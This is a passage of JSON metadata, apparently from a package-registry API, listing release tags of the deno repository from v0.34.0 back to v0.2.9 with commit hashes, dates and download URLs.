20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https: